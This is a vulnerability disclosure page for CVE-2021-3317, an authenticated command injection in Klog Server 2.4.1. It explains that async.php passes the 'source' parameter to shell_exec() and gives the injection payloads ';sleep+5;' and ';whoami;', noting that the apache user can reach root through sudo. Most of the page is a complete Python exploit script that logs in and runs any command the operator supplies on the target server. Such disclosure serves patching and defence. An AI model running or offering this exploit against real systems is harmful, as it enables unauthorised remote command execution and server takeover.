UI
Search…
0DAY
KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
Klog Server 2.4.1 - Command Injection (Authenticated)
Detection
I have detected a authenticated command injection vulnerability in the Klog Server <=2.4.1 .
async.php file includes that source parameter is executed via shell_exec() function without input validation.
As you can see above image, if
action parameter is set as stream , command injection could be possible due to source parameter is executed by shell_exec() function through command variable.To validate this vulnerability , sleep command is used. For
;sleep+5; command , the server stays 5 seconds or so. 
When
;whoami; command is executed , the output indicates privileges as apache user . However , apache user is a member of sudo group so that we can execute commad with root privileges.
Exploitation
1
import argparse
2
import requests
3
import sys
4
import urllib3
5
from argparse import ArgumentParser, Namespace
6
​
7
​
8
def main():
9
dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)"
10
parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
11
parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True)
12
parser.add_argument("--username", help="Username", type=str, required=True)
13
parser.add_argument("--password", help="Password", type=str, required=True)
14
parser.add_argument("--command", help="Command", type=str, required=True)
15
args: Namespace = parser.parse_args()
16
if args.target:
17
target = args.target
18
if args.username:
19
username = args.username
20
if args.password:
21
password = args.password
22
if args.command:
23
command = args.command
24
​
25
exploit(target, username, password, command)
26
​
27
​
28
def exploit(target, username, password, command):
29
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
30
s = requests.Session()
31
headers = {
32
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
33
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
34
"Accept-Language": "en-US,en;q=0.5",
35
"Accept-Encoding": "gzip, deflate",
36
"Content-Type": "application/x-www-form-urlencoded",
37
"Connection": "close",
38
"Upgrade-Insecure-Requests": "1",
39
}
40
41
data = {"user" : username, "pswd" : password}
42
​
43
login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False)
44
print("[*] Status Code for login request: " + str(login.status_code))
45
​
46
if login.status_code == 302:
47
check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False)
48
if check.status_code == 200:
49
print("[+] Authentication was successful!")
50
else:
51
print("[-] Authentication was unsuccessful!")
52
sys.exit(1)
53
else:
54
print("Something went wrong!")
55
sys.exit(1)
56
57
print("[*] Exploiting...\n")
58
​
59
executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False)
60
print(executeCommand.text)
61
sys.exit(0)
62
​
63
if __name__ == '__main__':
64
main()
65
​
Copied!
​
0DAY - Previous
Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
Next - 0DAY
Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
Last modified 11mo ago
Copy link